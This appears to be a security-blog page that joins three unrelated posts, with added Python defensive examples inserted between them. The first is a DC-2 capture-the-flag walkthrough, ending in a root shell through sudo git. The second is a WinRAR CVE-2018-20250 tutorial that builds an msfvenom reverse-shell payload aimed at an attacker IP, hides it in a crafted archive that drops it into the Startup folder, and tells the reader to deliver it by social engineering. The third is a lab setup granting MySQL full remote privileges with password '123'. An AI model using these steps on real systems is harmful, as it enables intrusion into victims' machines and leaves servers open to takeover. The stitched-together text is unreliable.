DC-2 Walkthrough


Hello friends! Today we are going to take on another boot2root challenge known as “DC-2”. The credit for making this VM goes to “DCAU”; as with the other boot2root challenges, our goal is to get root access to complete it. You can download it from here.
Security Level: Beginner

Penetrating Methodology:
·         Discovering Targets IP
·         Network scanning (Nmap)   
·         Adding Domain name to Host file
·         Surfing HTTP service port
·         Using WPscan for Username enumeration
·         Using cewl for creating wordlist
·         Logging into Wordpress
·         Logging in through SSH
·         Escaping restricted shell
·         Finding binary in sudoers list
·         Getting root access and Reading final flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover




We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.
nmap -p- -A 192.168.1.101
OKAY!! From the nmap scan result I found that port 7744 is used for SSH and port 80 for the HTTP service; moreover, it shows that the HTTP service redirects to http://dc-2.




Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.
cat /etc/hosts




Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.




The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.




So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.
wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u



I found three usernames: admin, jerry and tom. As said above, we need to use cewl, which generates a dictionary by spidering a website.



Therefore, we used cewl to build a password wordlist from the content of http://dc-2, as shown in the image.
cewl http://dc-2/ -w password
cat password



So we now have a password dictionary generated with cewl, and we saved the WordPress usernames in a text file.
cat users



Time to fire up wpscan with our username and password lists to find valid login combinations.
wpscan --url http://dc-2 -U users -P password



We have successfully found the password for Tom & Jerry. Let’s make good use of them.
jerry: adipiscing
tom: parturient



Further, we login to wordpress using Jerry credentials. It was holding another clue for us in Flag 2.



Since the clue told us to find another entry point to reach the final flag, we thought of trying an SSH login on port 7744 using Tom's credentials.
We logged in successfully, but landed in a restricted shell in which some commands are not found; only a few commands are available.
ssh tom@192.168.1.101 -p 7744
ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin
As you can observe, the cat program is not present inside /bin, and tom can run only the five programs present inside the /bin directory.



Since we had a restricted shell, we found that we can use the Vi editor. Therefore, we use Vi editor to escape the restricted shell.



After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and add “/usr/bin” to our PATH environment variable so that we can run Linux commands properly.
export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
After that we try to open flag3.txt again using the cat command and luckily find the next hint to move ahead.
ls
cat flag3.txt
According to the hint, we now need to switch user from tom to jerry, but we don’t have jerry’s login credentials. We then checked the sudoers list and found that tom can run “/usr/bin/git” as root without a password.
sudo -l
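The sudoers rule above is the entire privilege-escalation path on this box, so from the defender's side the useful question is how to find such rules before anyone else does. The following Python script is an added example, not part of the original walkthrough and not a tool from the DC-2 author: it parses a constructed /etc/sudoers excerpt and flags every NOPASSWD command that can run as root. The tom/git line mirrors what `sudo -l` reports; alice, bob and their rules are invented for illustration, and the SHELL_CAPABLE set contains only the two binaries this walkthrough itself uses to reach a shell (git and vi).

```python
import re

# Constructed /etc/sudoers excerpt (not the DC-2 machine's file). The tom line
# mirrors the rule that `sudo -l` reveals in the walkthrough; alice and bob are
# invented to show the other outcomes.
SAMPLE_SUDOERS = """\
# User privilege specification
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
tom     ALL=(root) NOPASSWD: /usr/bin/git
alice   ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/vi
bob     ALL=(ALL) /usr/bin/apt
"""

# user host=(runas) [TAG: ...] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

# Binaries this walkthrough itself uses to reach a shell: git (its help output
# opens in an editor/pager) and vi (used to escape the restricted shell).
# Constructed list; extend it from your own environment's findings.
SHELL_CAPABLE = {"git", "vi"}


def parse_sudoers(text):
    """Parse user-specification lines into dicts.

    Comments, blank lines, Defaults and alias definitions are skipped.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"user": m.group("user"), "runas": m.group("runas"),
                      "tags": tags, "cmds": cmds})
    return rules


def runs_as_root(runas):
    """(root), (ALL), (ALL:ALL) and an empty runas all allow running as root."""
    user = runas.split(":")[0].strip()
    return user in ("", "ALL", "root")


def audit(rules):
    """Return one finding per NOPASSWD command that can execute as root."""
    findings = []
    for r in rules:
        if "NOPASSWD" not in r["tags"] or not runs_as_root(r["runas"]):
            continue
        for cmd in r["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                severity, reason = "critical", "any command as root without a password"
            elif binary in SHELL_CAPABLE:
                severity, reason = "high", f"{binary} can drop to an interactive shell as root"
            else:
                severity, reason = "medium", "passwordless root execution; confirm it cannot be abused"
            findings.append({"user": r["user"], "cmd": cmd,
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"[{f['severity']:>8}] {f['user']}: {f['cmd']} -- {f['reason']}")
```

Point `parse_sudoers` at the real file contents (or at the output of `sudo -l` reshaped into the same `user host=(runas) TAG: cmd` form) and the tom/git rule shows up as a high-severity finding; a rule with plain `ALL` as the command is reported as critical.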



Having root permission on git was the cherry on the cake, because through it I can try to escalate the low-privilege shell to a high-privilege one.
sudo git help add



Since git's help page opens in an editor, we can run the command below from it: to spawn a root shell, type !/bin/bash and press Enter.




Boom!!! We got root access; then we switched to the root directory and found our final flag.
cd /root
ls
cat final-flag.txt



Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Code Execution from WinRAR


WinRAR, one of the world's most popular Windows file compression applications, patched a serious security flaw last month; it can only be exploited by tricking a WinRAR user into extracting a malicious archive. The vulnerability, identified last year by research.checkpoint.com, affects all WinRAR versions released over the past 19 years.

More About Evil WinRAR
CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253
Patched Version: WinRAR 5.70 Beta 1
This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. WinRAR uses the ACE format to compress a folder and unpacks the compressed folder with the help of UNACEV2.DLL.
In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability in the handling of the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored and the filename is treated as an absolute path. This happens because the filename is not properly validated when UNACEV2.dll is invoked.
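To make the filename-field flaw concrete from the defender's side, here is an added Python example; it is not code from the original post or from the Evil-WinRAR-Gen project. It places an extractor that trusts the entry name blindly beside one that validates it, using a constructed extraction directory and constructed entry names, and reproduces the path-handling class the text describes rather than any specific ACE byte pattern. The `ntpath` module is used so the Windows path semantics can be exercised on any platform.

```python
import ntpath

# Constructed extraction directory on the victim's machine (any path works).
EXTRACT_DIR = r"C:\Users\victim\Downloads\extracted"

# Constructed archive entry names: one benign, one with a harmless '..', and
# three shapes that a validating extractor must refuse.
SAMPLE_ENTRIES = [
    r"docs\readme.txt",
    r"docs\..\readme.txt",
    r"..\..\evil.exe",
    r"C:\Windows\Temp\evil.exe",
    r"C:evil.exe",
]


def naive_destination(extract_dir, entry_name):
    """Where an extractor that trusts the entry name would write the file.

    ntpath.join drops extract_dir as soon as entry_name is absolute, and
    normpath resolves '..' components, so a crafted name lands anywhere the
    extracting user can write. This is the behaviour class described above.
    """
    return ntpath.normpath(ntpath.join(extract_dir, entry_name))


def is_within(base_dir, candidate):
    """True if the normalised candidate path is base_dir or lies inside it."""
    base = ntpath.normcase(ntpath.normpath(base_dir))
    cand = ntpath.normcase(candidate)
    return cand == base or cand.startswith(base + ntpath.sep)


def safe_destination(extract_dir, entry_name):
    """Compute the destination only if it stays inside extract_dir.

    Rejects absolute names, drive-qualified names (C:foo as well as C:\\foo)
    and any name whose '..' components climb out of the extraction folder.
    """
    if (entry_name.startswith(("\\", "/")) or ntpath.isabs(entry_name)
            or ntpath.splitdrive(entry_name)[0]):
        raise ValueError(f"absolute or drive-qualified entry name: {entry_name!r}")
    dest = ntpath.normpath(ntpath.join(extract_dir, entry_name))
    if not is_within(extract_dir, dest):
        raise ValueError(f"entry escapes the extraction directory: {entry_name!r}")
    return dest


def plan_extraction(extract_dir, entry_names):
    """Map each entry name to ('ok', destination) or ('rejected', reason)."""
    plan = {}
    for name in entry_names:
        try:
            plan[name] = ("ok", safe_destination(extract_dir, name))
        except ValueError as err:
            plan[name] = ("rejected", str(err))
    return plan


if __name__ == "__main__":
    for name in SAMPLE_ENTRIES:
        status, detail = plan_extraction(EXTRACT_DIR, [name])[name]
        print(f"{name:<28} naive -> {naive_destination(EXTRACT_DIR, name)}")
        print(f"{'':<28} safe  -> {status}: {detail}")
```

The check normalises first and compares second, which is the order that matters: comparing the raw string against the base directory would let `docs\..\..\x` through, while normalising without the containment check is exactly what the naive path does.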
Let's download a python script that will generate a malicious file archive in a rar format. Once you download the python script, install the dependency required for it.

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt



Further, you need to make the python script inside the Evil-WinRAR-Gen folder executable, then generate a malicious exe with the help of msfvenom, naming it “winrar.exe” as shown, and start a multi/handler inside Metasploit.
chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe


Now create a text file that will be displayed to the victim when he extracts the rar file, to confuse him. Then execute the evilWinRAR python script with the malicious exe and the text file, creating a malicious archive that you can send to the target.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

As said, this vulnerability allows us to extract the malicious file to an arbitrary path; with the help of this script the rar file's contents will be extracted into the Startup folder. Now use social engineering to transfer the malicious rar to the victim and wait for the victim to restart his machine to obtain a reverse connection from the target.


There is currently no program in the target machine's Startup folder, as shown below. Once the victim extracts the malicious rar file "evil.rar", our winrar.exe backdoor will be extracted into the Startup folder.



To check for the winrar.exe file in the Startup folder, type shell:startup in the Run prompt.

As soon as the victim restarts the machine, you will get a reverse connection as shown.

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set up our own web server for penetration testing on Ubuntu 18. Ubuntu 18 comes with new features.

Table of contents
Requirement
Web Server configuration
·         Apache2
·         php7.2
·         MySQL server
·         phpMyAdmin
·         Ftp protocol
·         Openssh server
·         Nmap

Requirement: Ubuntu 18.0
Web Server Configuration
A web server is a program that uses HTTP to serve users with the files forming web pages, in response to requests transmitted by their HTTP clients. The term also refers to the dedicated computers and appliances that run such software.
Install Apache2
First, we will install Apache2. Apache is the most commonly used web server on Linux systems. Web servers serve the web pages requested by client computers. So let’s first install Apache on Ubuntu with the following command:
apt install apache2

We have successfully installed apache2; by default apache runs on port 80.

                                                          

Install PHP
Now we will install the PHP 7 module for Apache 2 and all of its dependencies. Earlier we used to install the PHP 5 module on Ubuntu 14, but it is not compatible with Ubuntu 18, so we will install the latest version of PHP, which is php7.2. For this, run the following command in the Ubuntu terminal:
apt install php7.2
As you can see, we are done with the PHP installation.


Install MySQL Server
Now comes the next step, which is the installation of the MySQL server. MySQL is the famous open-source database; it was easier to install earlier, but now it requires some changes on Ubuntu 18.
So, let’s go ahead step by step.
First, we will install the MySQL server with the following command:
apt-get install mysql-server



So, we are done with the installation. On Ubuntu 14, MySQL did not need a password, as it only required the root user to be logged in. But now it needs a password and it won’t allow the root user to log in, so we will provide a username and password for an Ubuntu user in MySQL with the following commands. When it asks for a password, use your Ubuntu password.
After logging in, grant all privileges to the Ubuntu user; in our case we give all privileges to user raj, identified by the Ubuntu password, which is 123 in our case. After that we flush the previous privileges so that the service starts with the new changes. The commands are the following:
mysql -u root -p
GRANT ALL PRIVILEGES ON *.* TO 'raj'@'%' IDENTIFIED BY '123' WITH GRANT OPTION;
FLUSH PRIVILEGES;
Great, we are done with the MySQL server installation; by default it runs on port 3306. Now restart the mysql service.
service mysql restart



Install phpMyAdmin
Now the next step is the installation of phpMyAdmin, a software tool written in PHP that is intended to handle the administration of MySQL over the web and supports a wide range of operations on MySQL. First, we need to install phpMyAdmin with the following command:
apt install phpmyadmin



After the installation it will ask you to choose the web server. Here you need to choose apache2, which will automatically be configured to run phpmyadmin.



Next you will get a prompt to configure the database for phpmyadmin with dbconfig-common. Here you need to select Yes and press Enter.



Again, you will get a prompt asking you to submit a password for phpMyAdmin to register with the database server. Here we have given 123 as the password, as it is now mandatory to set one.

 

The next step is the configuration of phpmyadmin under apache; for this we need to edit the apache2 conf file by adding two lines at the end of the file:
nano /etc/apache2/apache2.conf
#phpMyAdmin Configuration
Include /etc/phpmyadmin/apache.conf
Add them at the end as shown in the image below, save the file, and then restart the apache2 service.
service apache2 restart



Now open phpmyadmin in the browser at localhost/phpmyadmin as shown in the image below:



Install ftp
Now we will install an FTP server on Ubuntu, which is used for the transfer of computer files between a client and a server on a computer network. For this, run the following command in the terminal:
apt install vsftpd
As we can see in the above screenshot, the FTP service has been installed on our system; it runs on port 21.




Install ssh
Next is the SSH protocol, which is a method for secure remote login from one computer to another. So let's install this service with the following command. It is installed successfully; by default, it runs on port 22.
apt install openssh-server



Install Nmap
Now, in order to check that the above services have been installed properly on our system, we will use nmap, a port scanner that tells us about the open ports and the status of running services.
So, let’s install it with the following command:
apt install nmap



Once the installation is done, we will scan our own system with the following command; it will come up with the desired results, as you can see in the image given below:
nmap 127.0.0.1
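Instead of reading the nmap output by eye each time the lab is rebuilt, the expected ports can be checked programmatically. The Python script below is an added example and not part of the original post: it attempts a TCP connection to each port on 127.0.0.1 with a short timeout and reports which of the services installed above (ports taken from the text) are actually listening. The host, the timeout and the `open_test_listener` helper used for self-testing are assumptions of this example.

```python
import socket

# Services installed in this post and the ports the text says they use.
EXPECTED_SERVICES = {
    21: "vsftpd",
    22: "openssh-server",
    80: "apache2",
    3306: "mysql-server",
}


def port_is_open(host, port, timeout=1.0):
    """Return True when a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # connection refused, timed out or host unreachable
        return False


def check_services(host="127.0.0.1", services=EXPECTED_SERVICES, timeout=1.0):
    """Return {port: (service_name, listening)} for every expected service."""
    return {port: (name, port_is_open(host, port, timeout))
            for port, name in services.items()}


def missing_services(report):
    """Names of expected services that are not listening."""
    return [name for name, listening in report.values() if not listening]


def open_test_listener(host="127.0.0.1"):
    """Bind a listening socket on a free port; used only to self-test the checker."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    report = check_services()
    for port, (name, listening) in sorted(report.items()):
        print(f"{port:>5}/tcp  {name:<16} {'open' if listening else 'CLOSED'}")
    missing = missing_services(report)
    print("all lab services are up" if not missing
          else f"not listening: {', '.join(missing)}")
```

Run it on the lab host with `python3`; a CLOSED line means the package installed but the daemon is not running or is bound to a different address, which is worth checking before pointing any testing tool at the server.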